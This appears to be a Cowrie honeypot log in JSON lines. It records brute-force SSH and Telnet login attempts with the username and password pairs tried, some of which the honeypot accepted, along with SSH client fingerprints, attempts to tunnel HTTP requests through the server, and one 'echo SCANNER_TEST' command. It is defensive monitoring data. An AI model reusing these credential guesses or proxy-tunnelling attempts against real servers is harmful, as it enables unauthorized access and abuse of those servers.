{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:16:39.134588Z","src_ip":"45.88.8.215","session":"2b3cb698d34a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:16:39.135535Z","src_ip":"45.88.8.215","session":"2b3cb698d34a"}
{"eventid":"cowrie.login.success","username":"root","password":"Neelesh@123","message":"login attempt [root/Neelesh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:16:41.251541Z","src_ip":"45.88.8.215","session":"2b3cb698d34a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:16:41.699508Z","src_ip":"45.88.8.215","session":"2b3cb698d34a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53692,"dst_ip":"1.2.3.4","dst_port":22,"session":"924ec93bcad9","protocol":"ssh","message":"New connection: 217.72.205.35:53692 (1.2.3.4:22) [session: 924ec93bcad9]","sensor":"my-vps","timestamp":"2025-08-26T17:18:14.561735Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:18:14.563244Z","src_ip":"217.72.205.35","session":"924ec93bcad9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62232,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcf1a5d91198","protocol":"ssh","message":"New connection: 212.227.235.229:62232 (1.2.3.4:22) [session: fcf1a5d91198]","sensor":"my-vps","timestamp":"2025-08-26T17:18:22.937769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T17:18:22.938465Z","src_ip":"212.227.235.229","session":"fcf1a5d91198"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T17:18:23.069529Z","src_ip":"212.227.235.229","session":"fcf1a5d91198"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris","message":"login attempt [paris/paris] failed","sensor":"my-vps","timestamp":"2025-08-26T17:18:23.682254Z","src_ip":"212.227.235.229","session":"fcf1a5d91198"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris1","message":"login attempt [paris/paris1] failed","sensor":"my-vps","timestamp":"2025-08-26T17:18:24.815312Z","src_ip":"212.227.235.229","session":"fcf1a5d91198"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris123","message":"login attempt [paris/paris123] failed","sensor":"my-vps","timestamp":"2025-08-26T17:18:25.947376Z","src_ip":"212.227.235.229","session":"fcf1a5d91198"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris1234","message":"login attempt [paris/paris1234] failed","sensor":"my-vps","timestamp":"2025-08-26T17:18:27.079257Z","src_ip":"212.227.235.229","session":"fcf1a5d91198"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris12345","message":"login attempt [paris/paris12345] failed","sensor":"my-vps","timestamp":"2025-08-26T17:18:28.211107Z","src_ip":"212.227.235.229","session":"fcf1a5d91198"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:18:29.344367Z","src_ip":"212.227.235.229","session":"fcf1a5d91198"}
{"eventid":"cowrie.session.connect","src_ip":"59.21.12.133","src_port":49062,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce63cc89813a","protocol":"telnet","message":"New connection: 59.21.12.133:49062 (1.2.3.4:23) [session: ce63cc89813a]","sensor":"my-vps","timestamp":"2025-08-26T17:18:42.703991Z"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":4398,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c3df3b30b0f","protocol":"ssh","message":"New connection: 193.105.134.95:4398 (1.2.3.4:22) [session: 3c3df3b30b0f]","sensor":"my-vps","timestamp":"2025-08-26T17:18:43.743503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_2.0.0","message":"Remote SSH version: SSH-2.0-paramiko_2.0.0","sensor":"my-vps","timestamp":"2025-08-26T17:18:43.744496Z","src_ip":"193.105.134.95","session":"3c3df3b30b0f"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-26T17:18:43.789417Z","src_ip":"193.105.134.95","session":"3c3df3b30b0f"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:18:44.700963Z","src_ip":"193.105.134.95","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":26565,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:26565","sensor":"my-vps","timestamp":"2025-08-26T17:18:44.746884Z","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T17:18:44.792014Z","src_ip":"193.105.134.95","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":19192,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:19192","sensor":"my-vps","timestamp":"2025-08-26T17:18:44.922986Z","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T17:18:44.967584Z","src_ip":"193.105.134.95","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"193.105.134.95","src_port":4302,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4302","sensor":"my-vps","timestamp":"2025-08-26T17:18:45.099086Z","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T17:18:45.143835Z","src_ip":"193.105.134.95","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"193.105.134.95","src_port":26906,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26906","sensor":"my-vps","timestamp":"2025-08-26T17:18:45.275024Z","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T17:18:45.319659Z","src_ip":"193.105.134.95","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"193.105.134.95","src_port":27689,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:27689","sensor":"my-vps","timestamp":"2025-08-26T17:18:45.450982Z","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T17:18:45.495704Z","src_ip":"193.105.134.95","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"193.105.134.95","src_port":19894,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19894","sensor":"my-vps","timestamp":"2025-08-26T17:18:45.627023Z","session":"3c3df3b30b0f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T17:18:45.671738Z","src_ip":"193.105.134.95","session":"3c3df3b30b0f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:18:45.717126Z","src_ip":"193.105.134.95","session":"3c3df3b30b0f"}
{"eventid":"cowrie.session.closed","duration":30.441709756851196,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:19:13.145627Z","src_ip":"59.21.12.133","session":"ce63cc89813a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45772,"dst_ip":"1.2.3.4","dst_port":23,"session":"598d9626be57","protocol":"telnet","message":"New connection: 212.227.235.229:45772 (1.2.3.4:23) [session: 598d9626be57]","sensor":"my-vps","timestamp":"2025-08-26T17:19:22.445367Z"}
{"eventid":"cowrie.session.closed","duration":12.485534429550171,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:19:34.930816Z","src_ip":"212.227.235.229","session":"598d9626be57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46055,"dst_ip":"1.2.3.4","dst_port":23,"session":"542c1fa0cf0c","protocol":"telnet","message":"New connection: 212.227.235.229:46055 (1.2.3.4:23) [session: 542c1fa0cf0c]","sensor":"my-vps","timestamp":"2025-08-26T17:19:35.189238Z"}
{"eventid":"cowrie.session.closed","duration":12.759562492370605,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:19:47.948733Z","src_ip":"212.227.235.229","session":"542c1fa0cf0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46348,"dst_ip":"1.2.3.4","dst_port":23,"session":"a7f473dc9747","protocol":"telnet","message":"New connection: 212.227.235.229:46348 (1.2.3.4:23) [session: a7f473dc9747]","sensor":"my-vps","timestamp":"2025-08-26T17:19:48.179157Z"}
{"eventid":"cowrie.session.closed","duration":12.802185535430908,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:20:00.981256Z","src_ip":"212.227.235.229","session":"a7f473dc9747"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46654,"dst_ip":"1.2.3.4","dst_port":23,"session":"2f629532d83d","protocol":"telnet","message":"New connection: 212.227.235.229:46654 (1.2.3.4:23) [session: 2f629532d83d]","sensor":"my-vps","timestamp":"2025-08-26T17:20:01.218520Z"}
{"eventid":"cowrie.session.closed","duration":12.720884799957275,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:20:13.939280Z","src_ip":"212.227.235.229","session":"2f629532d83d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46945,"dst_ip":"1.2.3.4","dst_port":23,"session":"d2dddcf6e177","protocol":"telnet","message":"New connection: 212.227.235.229:46945 (1.2.3.4:23) [session: d2dddcf6e177]","sensor":"my-vps","timestamp":"2025-08-26T17:20:14.161625Z"}
{"eventid":"cowrie.session.closed","duration":12.780096769332886,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:20:26.941608Z","src_ip":"212.227.235.229","session":"d2dddcf6e177"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47246,"dst_ip":"1.2.3.4","dst_port":23,"session":"63f394a1b801","protocol":"telnet","message":"New connection: 212.227.235.229:47246 (1.2.3.4:23) [session: 63f394a1b801]","sensor":"my-vps","timestamp":"2025-08-26T17:20:27.176003Z"}
{"eventid":"cowrie.session.closed","duration":12.75357699394226,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:20:39.929510Z","src_ip":"212.227.235.229","session":"63f394a1b801"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47550,"dst_ip":"1.2.3.4","dst_port":23,"session":"c0a9a8a8e2c1","protocol":"telnet","message":"New connection: 212.227.235.229:47550 (1.2.3.4:23) [session: c0a9a8a8e2c1]","sensor":"my-vps","timestamp":"2025-08-26T17:20:40.227053Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15328,"dst_ip":"1.2.3.4","dst_port":22,"session":"72e1a7df1f65","protocol":"ssh","message":"New connection: 212.227.235.229:15328 (1.2.3.4:22) [session: 72e1a7df1f65]","sensor":"my-vps","timestamp":"2025-08-26T17:20:50.173180Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:20:50.174708Z","src_ip":"212.227.235.229","session":"72e1a7df1f65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15662,"dst_ip":"1.2.3.4","dst_port":22,"session":"5106933fd8e5","protocol":"ssh","message":"New connection: 212.227.235.229:15662 (1.2.3.4:22) [session: 5106933fd8e5]","sensor":"my-vps","timestamp":"2025-08-26T17:20:50.318562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:20:50.319586Z","src_ip":"212.227.235.229","session":"5106933fd8e5"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T17:20:50.458727Z","src_ip":"212.227.235.229","session":"5106933fd8e5"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:20:50.878578Z","src_ip":"212.227.235.229","session":"5106933fd8e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T17:20:51.021094Z","session":"5106933fd8e5"}
{"eventid":"cowrie.session.closed","duration":12.721981287002563,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:20:52.948932Z","src_ip":"212.227.235.229","session":"c0a9a8a8e2c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47851,"dst_ip":"1.2.3.4","dst_port":23,"session":"f9b219dae390","protocol":"telnet","message":"New connection: 212.227.235.229:47851 (1.2.3.4:23) [session: f9b219dae390]","sensor":"my-vps","timestamp":"2025-08-26T17:20:53.236001Z"}
{"eventid":"cowrie.session.closed","duration":12.73063039779663,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:21:05.966565Z","src_ip":"212.227.235.229","session":"f9b219dae390"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48144,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d65dd3b355b","protocol":"telnet","message":"New connection: 212.227.235.229:48144 (1.2.3.4:23) [session: 4d65dd3b355b]","sensor":"my-vps","timestamp":"2025-08-26T17:21:06.272236Z"}
{"eventid":"cowrie.session.closed","duration":12.724049806594849,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:21:18.996200Z","src_ip":"212.227.235.229","session":"4d65dd3b355b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48456,"dst_ip":"1.2.3.4","dst_port":23,"session":"21817bb07ce2","protocol":"telnet","message":"New connection: 212.227.235.229:48456 (1.2.3.4:23) [session: 21817bb07ce2]","sensor":"my-vps","timestamp":"2025-08-26T17:21:19.331671Z"}
{"eventid":"cowrie.session.closed","duration":12.728561162948608,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:21:32.059382Z","src_ip":"212.227.235.229","session":"21817bb07ce2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48757,"dst_ip":"1.2.3.4","dst_port":23,"session":"7617cb79abca","protocol":"telnet","message":"New connection: 212.227.235.229:48757 (1.2.3.4:23) [session: 7617cb79abca]","sensor":"my-vps","timestamp":"2025-08-26T17:21:32.258418Z"}
{"eventid":"cowrie.session.closed","duration":12.718118667602539,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:21:44.976447Z","src_ip":"212.227.235.229","session":"7617cb79abca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49055,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a2199e916aa","protocol":"telnet","message":"New connection: 212.227.235.229:49055 (1.2.3.4:23) [session: 2a2199e916aa]","sensor":"my-vps","timestamp":"2025-08-26T17:21:45.200564Z"}
{"eventid":"cowrie.session.closed","duration":12.765239715576172,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:21:57.965704Z","src_ip":"212.227.235.229","session":"2a2199e916aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49366,"dst_ip":"1.2.3.4","dst_port":23,"session":"c8f6588c9dfe","protocol":"telnet","message":"New connection: 212.227.235.229:49366 (1.2.3.4:23) [session: c8f6588c9dfe]","sensor":"my-vps","timestamp":"2025-08-26T17:21:58.291219Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:22:00.313515Z","src_ip":"212.227.235.229","session":"5106933fd8e5"}
{"eventid":"cowrie.session.closed","duration":12.727314949035645,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:22:11.018456Z","src_ip":"212.227.235.229","session":"c8f6588c9dfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49677,"dst_ip":"1.2.3.4","dst_port":23,"session":"750eec31c4a1","protocol":"telnet","message":"New connection: 212.227.235.229:49677 (1.2.3.4:23) [session: 750eec31c4a1]","sensor":"my-vps","timestamp":"2025-08-26T17:22:11.229255Z"}
{"eventid":"cowrie.session.closed","duration":12.724989175796509,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:22:23.954176Z","src_ip":"212.227.235.229","session":"750eec31c4a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49964,"dst_ip":"1.2.3.4","dst_port":23,"session":"6afbfbda8cdf","protocol":"telnet","message":"New connection: 212.227.235.229:49964 (1.2.3.4:23) [session: 6afbfbda8cdf]","sensor":"my-vps","timestamp":"2025-08-26T17:22:24.200912Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58658,"dst_ip":"1.2.3.4","dst_port":23,"session":"0c9c67b628a5","protocol":"telnet","message":"New connection: 212.227.125.160:58658 (1.2.3.4:23) [session: 0c9c67b628a5]","sensor":"my-vps","timestamp":"2025-08-26T17:22:32.852015Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T17:22:33.209212Z","src_ip":"212.227.125.160","session":"0c9c67b628a5"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T17:22:34.609997Z","src_ip":"212.227.125.160","session":"0c9c67b628a5"}
{"eventid":"cowrie.session.closed","duration":2.477144479751587,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:22:35.329092Z","src_ip":"212.227.125.160","session":"0c9c67b628a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60196,"dst_ip":"1.2.3.4","dst_port":23,"session":"971843f88a59","protocol":"telnet","message":"New connection: 212.227.125.160:60196 (1.2.3.4:23) [session: 971843f88a59]","sensor":"my-vps","timestamp":"2025-08-26T17:22:35.486808Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:22:35.874045Z","src_ip":"212.227.125.160","session":"971843f88a59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:22:35.895236Z","src_ip":"212.227.125.160","session":"971843f88a59"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T17:22:36.157294Z","src_ip":"212.227.125.160","session":"971843f88a59"}
{"eventid":"cowrie.session.closed","duration":12.74850082397461,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:22:36.949342Z","src_ip":"212.227.235.229","session":"6afbfbda8cdf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50264,"dst_ip":"1.2.3.4","dst_port":23,"session":"e79186d60982","protocol":"telnet","message":"New connection: 212.227.235.229:50264 (1.2.3.4:23) [session: e79186d60982]","sensor":"my-vps","timestamp":"2025-08-26T17:22:37.303814Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.8","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:22:38.727638Z","src_ip":"212.227.125.160","session":"971843f88a59"}
{"eventid":"cowrie.session.closed","duration":3.246626615524292,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:22:38.733334Z","src_ip":"212.227.125.160","session":"971843f88a59"}
